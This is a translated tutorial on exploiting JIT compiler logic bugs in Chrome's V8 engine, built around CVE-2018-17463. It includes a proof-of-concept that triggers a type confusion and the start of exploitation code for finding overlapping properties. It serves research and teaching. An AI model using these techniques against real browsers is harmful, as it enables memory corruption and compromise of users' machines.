Exploiting Logic Bugs in the V8 JIT Engine (CVE-2018-17463)

2019-08-24 Nevv

Exploiting Logic Bugs in JavaScript JIT Engines

Translated from: http://www.phrack.org/papers/jit_exploitation.html

0 - Introduction
1 - V8 Overview
    1.1 - Values
    1.2 - Maps
    1.3 - Object Summary
2 - An Introduction to Just-in-Time Compilation for JavaScript
    2.1 - Speculative Just-in-Time Compilation
    2.2 - Speculation Guards
    2.3 - Turbofan
    2.4 - Compiler Pipeline
    2.5 - A JIT Compilation Example
3 - JIT Compiler Vulnerabilities
    3.1 - Redundancy Elimination
    3.2 - CVE-2018-17463
4 - Exploitation
    4.1 - Constructing Type Confusions
    4.2 - Gaining Memory Read/Write
    4.3 - Reflections
    4.4 - Gaining Code Execution
5 - References
6 - Exploit Code

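0 - Introduction

This article uses CVE-2018-17463 as an example to introduce JIT compiler vulnerabilities. The bug was found during source code review and was afterwards fixed by Google. The exploit has been tested against Chrome version 69.0.3497.81 (64-bit), corresponding to v8 version 6.9.427.19.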

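1 - V8 Overview

V8 is Google's open source JavaScript engine and powers, among others, Chromium-based web browsers. It is written in C++. V8 is well documented, both in the source code and online [3]. Furthermore, v8 has several features that facilitate exploring its inner workings:

0. A number of builtin functions usable from JavaScript, enabled through the --allow-natives-syntax flag for d8 (v8's JavaScript shell). These allow the user, for example, to inspect an object via %DebugPrint, to trigger garbage collection with %CollectGarbage, or to force JIT compilation of a function through %OptimizeFunctionOnNextCall.
1. Various tracing modes, also enabled through command-line flags, which log numerous engine-internal events to stdout or a log file. With these it becomes possible to trace the behavior of the different optimization passes in the JIT compiler.
2. Miscellaneous tools in the tools/ subdirectory, such as turbolizer, a visualizer for the JIT IR.

1.1 - Values

As JavaScript is a dynamically typed language, the engine must store type information with every runtime value. In v8, this is accomplished through a combination of pointer tagging and the use of dedicated type information objects, called Maps. The different JavaScript value types in v8 are listed in src/objects.h, of which an excerpt is shown below.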


    // Inheritance hierarchy:
    // - Object
    //   - Smi          (immediate small integer)
    //   - HeapObject   (superclass for everything allocated in the heap)
    //     - JSReceiver  (suitable for property access)
    //       - JSObject
    //     - Name
    //       - String
    //     - HeapNumber
    //     - Map
    //     ...

A JavaScript value is then represented as a tagged pointer of static type Object*. On 64-bit architectures, the following tagging scheme is used:

    Smi:        [32 bit signed int] [31 bits unused] 0
    HeapObject: [64 bit direct pointer]            | 01

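As such, the pointer tag differentiates between Smis and HeapObjects. All further type information is then stored in a Map instance, to which a pointer can be found in every HeapObject at offset 0.

With this pointer tagging scheme, arithmetic or binary operations on Smis can often ignore the tag, as the lower 32 bits are all zeroes. However, dereferencing a HeapObject requires masking off the least significant bit (LSB) first. For that reason, all accesses to data members of a HeapObject have to go through special accessors that take care of clearing the LSB. In fact, objects in v8 do not have any C++ data members, as access to those would be impossible due to the pointer tag. Instead, the engine stores data members at predefined offsets in an object through the mentioned accessor functions. In essence, v8 thus defines the in-memory layout of objects itself instead of delegating this to the compiler.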
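The tagging scheme above can be modeled in a few lines of JavaScript. This is only a sketch that uses BigInt as a stand-in for a 64-bit machine word; the helper names (tagSmi, untagSmi, isSmi, untagHeapObject) are made up for illustration and are not v8 APIs.

```javascript
// Toy model of the 64-bit tagging scheme; BigInt stands in for a machine word.
const SMI_SHIFT = 32n;
const HEAP_OBJECT_TAG = 1n;

// A Smi keeps its payload in the upper 32 bits; the lower 32 bits stay zero.
function tagSmi(value) {
    return BigInt.asUintN(64, BigInt(value) << SMI_SHIFT);
}

// Arithmetic shift right restores the signed 32-bit payload.
function untagSmi(word) {
    return Number(BigInt.asIntN(64, word) >> SMI_SHIFT);
}

// The least significant bit distinguishes Smis (0) from HeapObjects (1).
function isSmi(word) {
    return (word & 1n) === 0n;
}

// Clearing the LSB yields the real address of a HeapObject.
function untagHeapObject(word) {
    return word & ~HEAP_OBJECT_TAG;
}
```

Because the tag bits of a Smi are zero, adding two tagged Smis directly yields the tagged sum, which is why Smi arithmetic can usually ignore the tag.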

1.2 - Maps

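The Map is a key data structure in v8, containing information such as

* The dynamic type of the object, i.e. String, Uint8Array, HeapNumber, ...
* The size of the object in bytes
* The properties of the object and where they are stored
* The type of the array elements, e.g. unboxed doubles or tagged pointers
* The prototype of the object

While the property names are usually stored in the Map, the property values are stored with the object itself in one of several possible regions. The Map then provides the exact location of the property value in the respective region. In general there are three different regions in which property values can be stored: inside the object itself ("inline properties"), in a separate, dynamically sized heap buffer ("out-of-line properties"), or, if the property name is an integer index [4], as array elements in a dynamically sized heap array. In the first two cases, the Map stores the slot number of the property value, while in the last case the slot number is the element index. This can be seen in the following example: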

    let o1 = {a: 42, b: 43};
    let o2 = {a: 1337, b: 1338};

After execution, memory contains the two objects and one Map shared by both:

                      +----------------+
                      |                |
                      | map1           |
                      |                |
                      | property: slot |
                      |      .a : 0    |
                      |      .b : 1    |
                      |                |
                      +----------------+
                          ^         ^
    +--------------+      |         |
    |              +------+         |
    |    o1        |           +--------------+
    |              |           |              |
    | slot : value |           |    o2        |
    |    0 : 42    |           |              |
    |    1 : 43    |           | slot : value |
    +--------------+           |    0 : 1337  |
                               |    1 : 1338  |
                               +--------------+

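As Maps are relatively expensive objects in terms of memory usage, they are shared as much as possible between "similar" objects. This can be seen in the previous example, where both o1 and o2 share the same Map, map1. However, if a third property .c (e.g. with value 1339) is added to o1, then the Map can no longer be shared, as o1 and o2 now have different properties. As such, a new Map is created for o1: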

       +----------------+       +----------------+
       |                |       |                |
       | map1           |       | map2           |
       |                |       |                |
       | property: slot |       | property: slot |
       | .a      : 0    |       | .a      : 0    |
       | .b      : 1    |       | .b      : 1    |
       |                |       | .c      : 2    |
       +----------------+       +----------------+
               ^                        ^
               |                        |
               |                        |
        +--------------+         +--------------+
        |              |         |              |
        |    o2        |         |    o1        |
        |              |         |              |
        | slot : value |         | slot : value |
        |    0 : 1337  |         |    0 : 42    |
        |    1 : 1338  |         |    1 : 43    |
        +--------------+         |    2 : 1339  |
                                 +--------------+

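If the same property .c is later added to o2 as well, then both objects will again share map2. This works efficiently because each Map keeps track of which new Map an object should be transitioned to when a property of a certain name (and possibly type) is added to it. This data structure is commonly called a transition table.

V8 is, however, also capable of storing the properties as a hash map instead of using the Map and slot mechanism, in which case the property name is directly mapped to the value. This is used when the engine believes that the Map mechanism would only induce additional overhead, such as in the case of singleton objects.

The Map mechanism is also essential for garbage collection: when the collector processes an allocation (a HeapObject), it can immediately retrieve information such as the object's size, and whether the object contains any other tagged pointers that need to be scanned, by inspecting the Map.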
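The Map sharing and transition table described in this section can be sketched as a toy model. ToyMap and ToyObject are hypothetical names introduced here for illustration; v8's real Maps carry far more state (types, prototypes, element kinds), and the built-in JavaScript Map class is used below only as a lookup table.

```javascript
// Toy model of shared Maps with a transition table (not v8's real layout).
class ToyMap {
    constructor(slots = new Map()) {
        this.slots = slots;            // property name -> slot number
        this.transitions = new Map();  // property name -> successor ToyMap
    }

    // Return the ToyMap an object moves to when property `name` is added.
    transition(name) {
        let next = this.transitions.get(name);
        if (!next) {
            const slots = new Map(this.slots);
            slots.set(name, slots.size);   // next free slot
            next = new ToyMap(slots);
            this.transitions.set(name, next);
        }
        return next;
    }
}

class ToyObject {
    constructor(rootMap) {
        this.map = rootMap;
        this.values = [];              // slot number -> value
    }
    set(name, value) {
        if (!this.map.slots.has(name)) this.map = this.map.transition(name);
        this.values[this.map.slots.get(name)] = value;
    }
    get(name) {
        const slot = this.map.slots.get(name);
        return slot === undefined ? undefined : this.values[slot];
    }
}

const root = new ToyMap();
const o1 = new ToyObject(root); o1.set('a', 42);   o1.set('b', 43);
const o2 = new ToyObject(root); o2.set('a', 1337); o2.set('b', 1338);
const sharedInitially = o1.map === o2.map;   // both objects use "map1"
o1.set('c', 1339);
const sharedAfterAddingC = o1.map === o2.map;   // o1 moved on to "map2"
o2.set('c', 1340);
const sharedAgain = o1.map === o2.map;   // o2 followed the same transition
```

The transition table is what lets o2 arrive at the very same map2 instead of allocating a third Map.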

1.3 - Object Summary

Consider the following code snippet:

    let obj = {
      x: 0x41,
      y: 0x42
    };
    obj.z = 0x43;
    obj[0] = 0x1337;
    obj[1] = 0x1338;

After execution in v8, inspecting the memory at the address of the object shows:

    (lldb) x/5gx 0x23ad7c58e0e8
    0x23ad7c58e0e8: 0x000023adbcd8c751 0x000023ad7c58e201
    0x23ad7c58e0f8: 0x000023ad7c58e229 0x0000004100000000
    0x23ad7c58e108: 0x0000004200000000

    (lldb) x/3gx 0x23ad7c58e200
    0x23ad7c58e200: 0x000023adafb038f9 0x0000000300000000
    0x23ad7c58e210: 0x0000004300000000

    (lldb) x/6gx 0x23ad7c58e228
    0x23ad7c58e228: 0x000023adafb028b9 0x0000001100000000
    0x23ad7c58e238: 0x0000133700000000 0x0000133800000000
    0x23ad7c58e248: 0x000023adafb02691 0x000023adafb02691
    ...

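First there is the object itself, which consists of a pointer to its Map (0x23adbcd8c751), the pointer to its out-of-line properties (0x23ad7c58e201), the pointer to its elements (0x23ad7c58e229), and the two inline properties (x and y).

Inspecting the out-of-line properties pointer shows another object that starts with a Map (which indicates that this is a FixedArray), followed by the size and the property z. The elements array again starts with a pointer to the Map, followed by the capacity, followed by the two elements with index 0 and 1. The remaining slots are set to the magic value "the_hole" (indicating that the backing memory has been overcommitted). As can be seen, all values are stored as tagged pointers. If further objects were created in the same fashion, they would reuse the existing Maps.

2 - An Introduction to Just-in-Time Compilation for JavaScript

Modern JavaScript engines typically employ an interpreter and one or more just-in-time compilers. As a unit of code is executed more frequently, it is moved to higher tiers which are capable of executing the code faster, although their startup time is usually higher as well. The next section aims to give an intuitive introduction, rather than a formal explanation, of how JIT compilers for dynamic languages such as JavaScript manage to produce optimized machine code from a script.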

2.1 - Speculative Just-in-Time Compilation

Consider the following two code snippets. How could each of them be compiled to machine code?


    // C++
    int add(int a, int b) {
        return a + b;
    }

    // JavaScript
    function add(a, b) {
        return a + b;
    }

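The answer seems rather clear for the first code snippet. After all, the types of the arguments as well as the ABI, which specifies the registers used for parameters and return values, are known. Further, the instruction set of the target machine is available. As such, compilation to machine code might produce the following x86_64 code:

    lea eax, [rdi + rsi]
    ret

For the JavaScript code, however, type information is not known. As such, it seems impossible to produce anything better than a generic add operation handler [5], which would only provide a negligible performance boost over the interpreter. As it turns out, dealing with missing type information is a key challenge to overcome when compiling dynamic languages to machine code. This can also be seen by imagining a hypothetical JavaScript dialect which uses static typing, for example: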

    function add(a: Smi, b: Smi) -> Smi {
        return a + b;
    }

In this case, it is again rather easy to produce machine code:

    mov     rax, rdi
    add     rax, rsi            ; unlike lea, add sets the overflow flag
    jo      bailout_integer_overflow
    ret

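This is possible because the lower 32 bits of a Smi are all zero due to the pointer tagging scheme. This assembly code looks very similar to the C++ example, except for the additional overflow check, which is required since JavaScript does not know about integer overflows (in the specification all numbers are IEEE 754 double precision floating point numbers), but CPUs certainly do. As such, in the unlikely event of an integer overflow, the engine would have to transfer execution to a different, more generic execution tier like the interpreter. There it would repeat the failed operation, in this case converting both inputs to floating point numbers prior to adding them together. This mechanism is commonly called a bailout and is essential for JIT compilers, as it allows them to produce specialized code which can always fall back to more generic code if an unexpected situation occurs.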
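The bailout idea can be illustrated in plain JavaScript. The sketch below is only an analogy: addSmiFast stands in for the specialized machine code, addGeneric for the interpreter's generic handler, and the BAILOUT marker for the jump to bailout_integer_overflow. All names are invented for this example.

```javascript
const SMI_MIN = -(2 ** 31);
const SMI_MAX = 2 ** 31 - 1;

// Marker signalling that the specialized path gave up.
const BAILOUT = Symbol('bailout');

// "Optimized" code: only valid while the result still fits into a Smi.
function addSmiFast(a, b) {
    const result = a + b;
    if (result < SMI_MIN || result > SMI_MAX) {
        return BAILOUT;   // models `jo bailout_integer_overflow`
    }
    return result;
}

// Generic tier: repeats the operation with full double semantics.
function addGeneric(a, b) {
    return a + b;
}

// Run the fast path first and repeat the operation generically on bailout.
function add(a, b) {
    const fast = addSmiFast(a, b);
    return fast === BAILOUT ? addGeneric(a, b) : fast;
}
```

Calling add(SMI_MAX, 1) takes the bailout path and still returns the mathematically correct value, which is the property that makes speculation safe.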

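Unfortunately, for plain JavaScript, the JIT compiler does not have the comfort of static type information. However, as JIT compilation only happens after several executions in a lower tier, such as the interpreter, the JIT compiler can use type information from previous executions. This, in turn, enables speculative optimization: the compiler will assume that a unit of code will be used in a similar way in the future and thus see the same types for e.g. the arguments. It can then produce optimized code like the one shown above, assuming that the same types will be used in the future.

2.2 - Speculation Guards

Of course, there is no guarantee that a unit of code will always be used in a similar way. As such, the compiler must verify that all of its type speculations still hold at runtime before executing the optimized code. This is accomplished through a number of lightweight runtime checks, discussed next.

By inspecting feedback from previous executions and the current engine state, the JIT compiler first formulates various speculations such as "this value will always be a Smi", or "this value will always be an object with a specific Map", or even "this Smi addition will never cause an integer overflow". Each of these speculations is then verified to still hold at runtime with a short piece of machine code, called a speculation guard. If the guard fails, it performs a bailout to a lower execution tier such as the interpreter. Below are two commonly used speculation guards: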

    ; Ensure is Smi
    test    rdi, 0x1
    jnz     bailout

    ; Ensure has expected Map
    cmp    QWORD PTR [rdi-0x1], 0x12345601
    jne    bailout

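The first guard, a Smi guard, verifies that some value is a Smi by checking that the pointer tag is zero.

The second guard, a Map guard, verifies that a HeapObject in fact has the Map that it is expected to have.

Using speculation guards, dealing with missing type information becomes:

0. Gather type profiles during execution in the interpreter
1. Speculate that the same types will be used in the future
2. Guard those speculations with runtime speculation guards
3. Afterwards, produce optimized code for the previously seen types

In essence, inserting a speculation guard adds a piece of static type information to the code following it.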
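The four steps above can be sketched as a tiny tiering wrapper. This is a simplified model under stated assumptions: makeSpeculativeAdd, the call-count threshold, and the single "only Smis seen" profile bit are all invented for illustration, and fastSmiAdd merely stands in for specialized machine code.

```javascript
// True if v could be represented as a 32-bit Smi (-0 would need a double).
const isSmi = (v) =>
    Number.isInteger(v) && !Object.is(v, -0) &&
    v >= -(2 ** 31) && v <= 2 ** 31 - 1;

function makeSpeculativeAdd(threshold = 3) {
    let calls = 0;
    let onlySmisSeen = true;   // step 0: the type profile
    let optimized = false;
    let bailouts = 0;

    const generic = (a, b) => a + b;      // handles every input type
    const fastSmiAdd = (a, b) => a + b;   // stand-in for Smi-only machine code

    function add(a, b) {
        if (optimized) {
            // Step 2: speculation guards protect the specialized code.
            if (isSmi(a) && isSmi(b)) return fastSmiAdd(a, b);
            bailouts++;
            optimized = false;            // discard the compiled code
        }
        // Step 0: collect feedback while running in the generic tier.
        calls++;
        onlySmisSeen = onlySmisSeen && isSmi(a) && isSmi(b);
        // Steps 1 and 3: speculate on the profile and "compile".
        if (calls >= threshold && onlySmisSeen) optimized = true;
        return generic(a, b);
    }

    add.state = () => ({ optimized, bailouts });
    return add;
}
```

Once a non-Smi argument has been observed, the profile no longer supports the Smi speculation, so this toy version never re-optimizes; a real engine would instead recompile for the wider set of types.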

2.3 - Turbofan

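Even though an internal representation of the user's JavaScript code is already available in the form of bytecode for the interpreter, JIT compilers commonly convert the bytecode to a custom intermediate representation (IR) which is better suited for the various optimizations performed. Turbofan, the JIT compiler inside v8, is no exception. The IR used by turbofan is graph-based, consisting of operations (nodes) and different types of edges between them, namely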

control-flow edges, connecting control-flow operations such as loops and if conditions
data-flow edges, connecting input and output values
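effect-flow edges, connecting effectful operations such that they are scheduled correctly. For example: consider a store to a property followed by a load of the same property. As there is no data- or control-flow dependency between the two operations, effect-flow is needed to correctly schedule the store before the load.

Further, the turbofan IR supports three different types of operations: JavaScript operations, simplified operations, and machine operations. Machine operations usually resemble a single machine instruction while JS operations resemble a generic bytecode instruction. Simplified operations are somewhere in between. As such, machine operations can directly be translated into machine instructions while the other two types of operations require further conversion steps to lower-level operations (a process called lowering). For example, the generic property load operation could be lowered to a CheckHeapObject and a CheckMaps operation followed by an 8-byte load from an inline slot of an object.

A comfortable way to study the behavior of the JIT compiler in various scenarios is through v8's turbolizer tool [6]: a small web application that consumes the output produced by the --trace-turbo command line flag and renders it as an interactive graph.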

2.4 - Compiler Pipeline

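Given the previously described mechanisms, a typical JavaScript JIT compiler pipeline looks roughly as follows:

0. Graph building and specialization: the bytecode as well as runtime type profiles from the interpreter are consumed and an IR graph, representing the same computations, is constructed. Type profiles are inspected and, based on them, speculations are formulated, e.g. about which types of values to expect for an operation. The speculations are guarded with speculation guards.
1. Optimization: the resulting graph, which now has static type information due to the guards, is optimized much like "classic" ahead-of-time compilers do. Here an optimization is defined as a transformation of code that is not required for correctness but improves the execution speed or memory footprint of the code. Typical optimizations include loop-invariant code motion, constant folding, escape analysis, and inlining.
2. Lowering: finally, the resulting graph is lowered to machine code which is then written into an executable memory region. From that point on, invoking the compiled function will result in a transfer of execution to the generated code.

This structure is rather flexible though. For example, lowering could happen in multiple stages with further optimizations in between them. In addition, register allocation has to be performed at some point, which is, however, also an optimization to some degree.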

2.5 - A JIT Compilation Example

This chapter is concluded with an example of the following function being JIT compiled by turbofan:

    function foo(o) {
        return o.b;
    }

During parsing, the function would first be compiled to generic bytecode, which can be inspected using the --print-bytecode flag for d8. The output is shown below.

    Parameter count 2
    Frame size 0
       12 E> 0 : a0                StackCheck
       31 S> 1 : 28 02 00 00       LdaNamedProperty a0, [0], [0]
       33 S> 5 : a4                Return
    Constant pool (size = 1)
    0x1fbc69c24ad9: [FixedArray] in OldSpace
     - map: 0x1fbc6ec023c1 <Map>
     - length: 1
               0: 0x1fbc69c24301 <String[1]: b>

The function is mainly compiled to two operations: LdaNamedProperty, which loads property .b of the provided argument, and Return, which returns said property. The StackCheck operation at the beginning of the function guards against stack overflows by throwing an exception if the call stack size is exceeded. More information about v8's bytecode format and interpreter can be found online [7].

To trigger JIT compilation, the function has to be invoked several times:

    for (let i = 0; i < 100000; i++) {
        foo({a: 42, b: 43});
    }

    /* Or by using a native after providing some type information: */
    foo({a: 42, b: 43});
    foo({a: 42, b: 43});
    %OptimizeFunctionOnNextCall(foo);
    foo({a: 42, b: 43});

This will also populate the feedback vector of the function, which associates observed input types with bytecode operations. In this case, the feedback vector entry for the LdaNamedProperty would contain a single entry: the Map of the objects that were given to the function as argument. This Map will indicate that property .b is stored in the second inline slot.

Once turbofan starts compiling, it will build a graph representation of the JavaScript code. It will also inspect the feedback vector and, based on that, speculate that the function will always be called with an object of a specific Map. Next, it guards these assumptions with two runtime checks, which will bail out to the interpreter if the assumptions ever turn out to be false, then proceeds to emit a property load for an inline property. The optimized graph will ultimately look similar to the one shown below. Here, only data-flow edges are shown.


        +----------------+
        |                |
        |  Parameter[1]  |
        |                |
        +-------+--------+
                |                   +-------------------+
                |                   |                   |
                +------------------->  CheckHeapObject  |
                                    |                   |
                                    +----------+--------+
          +------------+                       |
          |            |                       |
          |  CheckMap  <-----------------------+
          |            |
          +-----+------+
                |                   +------------------+
                |                   |                  |
                +------------------->  LoadField[+32]  |
                                    |                  |
                                    +----------+-------+
           +----------+                        |
           |          |                        |
           |  Return  <------------------------+
           |          |
           +----------+

This graph will then be lowered to machine code similar to the following.

    ; Ensure o is not a Smi
    test    rdi, 0x1
    jz      bailout_not_object

    ; Ensure o has the expected Map
    cmp     QWORD PTR [rdi-0x1], 0xabcd1234
    jne     bailout_wrong_map

    ; Perform operation for object with known Map
    mov     rax, [rdi+0x1f]
    ret

If the function were to be called with an object with a different Map, the second guard would fail, causing a bailout to the interpreter (more precisely to the LdaNamedProperty operation of the bytecode) and likely the discarding of the compiled code. Eventually, the function would be recompiled to take the new type feedback into account. In that case, the function would be re-compiled to perform a polymorphic property load (supporting more than one input type), e.g. by emitting code for the property load for both Maps, then jumping to the respective one depending on the current Map. If the operation becomes even more polymorphic, the compiler might decide to use a generic inline cache (IC) [8][9] for the polymorphic operation. An IC caches previous lookups but can always fall-back to the runtime function for previously unseen input types without bailing out of the JIT code.
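The inline cache mentioned above can be approximated in plain JavaScript. This is only a conceptual sketch: shapeKey is a hypothetical stand-in for comparing Map pointers (script code cannot observe real Maps), and makeLoadIC with its maxEntries limit is invented for this example.

```javascript
// Stand-in for a Map pointer: objects with the same keys in the same order
// are treated as having the same shape.
const shapeKey = (o) => Object.keys(o).join(',');

function makeLoadIC(name, maxEntries = 4) {
    const handlers = new Map();   // shape key -> specialized loader
    let misses = 0;

    function load(o) {
        const handler = handlers.get(shapeKey(o));
        if (handler) return handler(o);        // hit: use the cached "slot"

        // Miss: fall back to the generic lookup and remember the result.
        misses++;
        if (handlers.size < maxEntries) {
            const slot = Object.keys(o).indexOf(name);
            handlers.set(
                shapeKey(o),
                slot < 0 ? () => undefined
                         : (obj) => Object.values(obj)[slot]);
        }
        return o[name];
    }

    load.misses = () => misses;
    return load;
}
```

A previously unseen shape costs one slow lookup but does not invalidate the handlers already cached for other shapes, which mirrors how an IC avoids bailing out of the JIT code.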

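3 - JIT Compiler Vulnerabilities

JavaScript JIT compilers are commonly implemented in C++ and as such are subject to the usual list of memory- and type-safety violations. These are not specific to JIT compilers and will thus not be discussed further. Instead, the focus will be put on bugs in the compiler which lead to incorrect machine code generation, which can then be exploited to cause memory corruption.

Besides bugs in the lowering phases [10][11], which often result in rather classic vulnerabilities like integer overflows in the generated machine code, many interesting bugs come from the various optimizations. There have been bugs in bounds-check elimination [12][13][14][15], escape analysis [16][17], register allocation [18], and others.

Each optimization pass tends to yield its own kind of vulnerabilities. When auditing complex software such as JIT compilers, it is often a sensible approach to determine specific vulnerability patterns in advance and look for instances of them. This is also a benefit of manual code auditing: knowing that a particular type of bug usually leads to a simple, reliable exploit is something the auditor can look for specifically.

As such, a specific optimization, namely redundancy elimination, will be discussed next, along with the type of vulnerability one can find there and a concrete vulnerability, CVE-2018-17463.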

3.1 - Redundancy Elimination

One popular class of optimizations aims to remove safety checks from the emitted machine code if they are determined to be unnecessary. As can be imagined, these are very interesting for the auditor as a bug in those will usually result in some kind of type confusion or out-of-bounds access.

One instance of these optimization passes, often called "redundancy elimination", aims to remove redundant type checks. As an example, consider the following code:

    function foo(o) {
        return o.a + o.b;
    }

Following the JIT compilation approach outlined in chapter 2, the following IR code might be emitted for it:


    CheckHeapObject o
    CheckMap o, map1
    r0 = Load [o + 0x18]

    CheckHeapObject o
    CheckMap o, map1
    r1 = Load [o + 0x20]

    r2 = Add r0, r1
    CheckNoOverflow
    Return r2

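The obvious issue here is the redundant second pair of CheckHeapObject and CheckMap operations. In this case it is clear that the Map of o cannot change between the two CheckMap operations. The goal of redundancy elimination is thus to detect these types of redundant checks and remove all but the first one on the same control flow path.

However, certain operations can cause side-effects: observable changes to the execution context. For example, a Call operation invoking a user-supplied function could easily cause an object's Map to change, e.g. by adding or removing a property. In that case, a seemingly redundant check is in fact required, as the Map could change in between the two checks.

As such, it is essential for this optimization that the compiler knows about all effectful operations in its IR. Unsurprisingly, correctly predicting the side effects of JIT operations can be quite hard due to the nature of the JavaScript language. Bugs related to incorrect side-effect predictions thus appear from time to time and are typically exploited by tricking the compiler into removing a seemingly redundant type check, then invoking the compiled code such that an object of an unexpected type is used without a preceding type check. Some form of type confusion then follows.

Vulnerabilities related to incorrect modeling of side-effects can usually be found by locating IR operations which are assumed to be side-effect free by the engine, then verifying whether they really are side-effect free in all cases. This is how CVE-2018-17463 was found.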
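To make the role of side-effect annotations concrete, here is a toy redundancy elimination pass over a linear list of pseudo IR operations. It is a sketch under simplifying assumptions (a single control flow path, checks identified by name and arguments, one boolean noWrite flag per operation) and does not reflect turbofan's actual data structures.

```javascript
// Remove checks that were already proven on this path. Any operation that
// may write to the effect chain invalidates everything proven so far.
function eliminateRedundantChecks(ops) {
    const proven = new Set();
    const out = [];
    for (const op of ops) {
        if (op.isCheck) {
            const key = `${op.name}(${op.args.join(', ')})`;
            if (proven.has(key)) continue;   // redundant: drop it
            proven.add(key);
        } else if (!op.noWrite) {
            proven.clear();                  // possible side effect
        }
        out.push(op);
    }
    return out;
}

// Pseudo IR for: load o.a, call something with o, load o.b.
function buildIR(callIsNoWrite) {
    return [
        { name: 'CheckHeapObject', args: ['o'], isCheck: true },
        { name: 'CheckMap', args: ['o', 'map1'], isCheck: true },
        { name: 'Load', args: ['o', '0x18'], noWrite: true },
        { name: 'Call', args: ['userFunction', 'o'], noWrite: callIsNoWrite },
        { name: 'CheckMap', args: ['o', 'map1'], isCheck: true },
        { name: 'Load', args: ['o', '0x20'], noWrite: true },
    ];
}

const countMapChecks = (ops) =>
    ops.filter((op) => op.name === 'CheckMap').length;
```

With the call correctly modeled as effectful, both CheckMap operations survive. If the same call is wrongly annotated as noWrite, the second check disappears, which is exactly the class of bug discussed here.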

3.2 - CVE-2018-17463

In v8, IR operations have various flags associated with them. One of them, kNoWrite, indicates that the engine assumes that an operation will not have observable side-effects, i.e. that it does not "write" to the effect chain. An example of such an operation was JSCreateObject, shown below:


    #define CACHED_OP_LIST(V)                                            \
      ...                                                                \
      V(CreateObject, Operator::kNoWrite, 1, 1)                          \
      ...

To determine whether an IR operation might have side-effects, it is often necessary to look at the lowering phases which convert high-level operations, such as JSCreateObject, into lower-level operations and eventually machine instructions. For JSCreateObject, the lowering happens in js-generic-lowering.cc, which is responsible for lowering JS operations:

    void JSGenericLowering::LowerJSCreateObject(Node* node) {
      CallDescriptor::Flags flags = FrameStateFlagForCall(node);
      Callable callable = Builtins::CallableFor(
          isolate(), Builtins::kCreateObjectWithoutProperties);
      ReplaceWithStubCall(node, callable, flags);
    }

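In plain English, this means that a JSCreateObject operation will be lowered to a call to the runtime function CreateObjectWithoutProperties. This function in turn ends up calling ObjectCreate, another builtin, but this time implemented in C++. Eventually, control flow ends up in JSObject::OptimizeAsPrototype. This is interesting, as it seems to imply that the prototype object may be modified during said optimization, which could be an unexpected side-effect for the JIT compiler. The following code snippet can be run to check whether OptimizeAsPrototype modifies the object in some way: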


    let o = {a: 42};
    %DebugPrint(o);
    Object.create(o);
    %DebugPrint(o);

Indeed, running it with `d8 --allow-natives-syntax` shows:

    DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
    - map: 0x0344c6f02571 <Map(HOLEY_ELEMENTS)> [FastProperties]
    ...

    DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
    - map: 0x0344c6f0d6d1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]

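As can be seen, the object's Map has changed when becoming a prototype, so the object must have changed in some way as well. In particular, when becoming a prototype, the out-of-line property storage of the object was converted to dictionary mode. As such, the pointer at offset 8 from the object will no longer point to a PropertyArray (all properties one after each other, after a short header), but instead to a NameDictionary (a more complex data structure directly mapping property names to values without relying on the Map). This certainly is a side effect, and in this case an unexpected one for the JIT compiler. The reason for the Map change is that in v8, prototype Maps are never shared due to clever optimization tricks in other parts of the engine [19].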

At this point it is time to construct a first proof-of-concept for the bug. The requirements to trigger an observable misbehavior in a compiled function are:

    0. The function must receive an object that is not currently used as a
    prototype.

    1. The function needs to perform a CheckMap operation so that
    subsequent ones can be eliminated.

    2. The function needs to call Object.create with the object as argument
    to trigger the Map transition.

    3. The function needs to access an out-of-line property. This will,
    after a CheckMap that will later be incorrectly eliminated, load the
    pointer to the property storage, then dereference that believing that
    it is pointing to a PropertyArray even though it will point to a
    NameDictionary.

The following JavaScript code snippet accomplishes this:

    function hax(o) {
        // Force a CheckMaps node.
        o.a;

        // Cause unexpected side-effects.
        Object.create(o);

        // Trigger type-confusion because CheckMaps node is removed.
        return o.b;
    }

    for (let i = 0; i < 100000; i++) {
        let o = {a: 42};
        o.b = 43;           // will be stored out-of-line.
        hax(o);
    }

It will first be compiled to pseudo IR code similar to the following:


    CheckHeapObject o
    CheckMap o, map1
    Load [o + 0x18]

    // Changes the Map of o
    Call CreateObjectWithoutProperties, o

    CheckMap o, map1
    r1 = Load [o + 0x8]         // Load pointer to out-of-line properties
    r2 = Load [r1 + 0x10]       // Load property value

    Return r2

Afterwards, the redundancy elimination pass will incorrectly remove the second Map check, yielding:

    CheckHeapObject o
    CheckMap o, map1
    Load [o + 0x18]

    // Changes the Map of o
    Call CreateObjectWithoutProperties, o

    r1 = Load [o + 0x8]
    r2 = Load [r1 + 0x10]

    Return r2

When this JIT code is run for the first time, it will return a value other than 43, namely an internal field of the NameDictionary which happens to be located at the same offset as the .b property in the PropertyArray. Note that in this case, the JIT compiler tried to infer the type of the argument object at the second property load instead of relying on the type feedback and thus, assuming the Map wouldn't change after the first type check, produced a property load from a FixedArray instead of a NameDictionary.

4 - Exploitation

The bug at hand allows the confusion of a PropertyArray with a NameDictionary. Interestingly, the NameDictionary still stores the property values inside a dynamically sized inline buffer of (name, value, flags) triples. As such, there likely exists a pair of properties P1 and P2 such that both P1 and P2 are located at offset O from the start of either the PropertyArray or the NameDictionary respectively. This is interesting for reasons explained in the next section. Shown next is the memory dump of the PropertyArray and NameDictionary for the same properties side by side:


    let o = {inline: 42};
    o.p0 = 0; o.p1 = 1; o.p2 = 2; o.p3 = 3; o.p4 = 4;
    o.p5 = 5; o.p6 = 6; o.p7 = 7; o.p8 = 8; o.p9 = 9;

    0x0000130c92483e89         0x0000130c92483bb1
    0x0000000c00000000         0x0000006500000000
    0x0000000000000000         0x0000000b00000000
    0x0000000100000000         0x0000000000000000
    0x0000000200000000         0x0000002000000000
    0x0000000300000000         0x0000000c00000000
    0x0000000400000000         0x0000000000000000
    0x0000000500000000         0x0000130ce98a4341
    0x0000000600000000  <-!->  0x0000000200000000
    0x0000000700000000         0x000004c000000000
    0x0000000800000000         0x0000130c924826f1
    0x0000000900000000         0x0000130c924826f1
    ...                        ...

In this case the properties p6 and p2 overlap after the conversion to dictionary mode. Unfortunately, the layout of the NameDictionary will be different in every execution of the engine due to some process-wide randomness being used in the hashing mechanism. It is thus necessary to first find such a matching pair of properties at runtime. The following code can be used for that purpose.


    function find_matching_pair(o) {
        let a = o.inline;
        this.Object.create(o);
        let p0 = o.p0;
        let p1 = o.p1;
        ...;
        let pN = o.pN;
        return [p0, p1, ..., pN];
    }

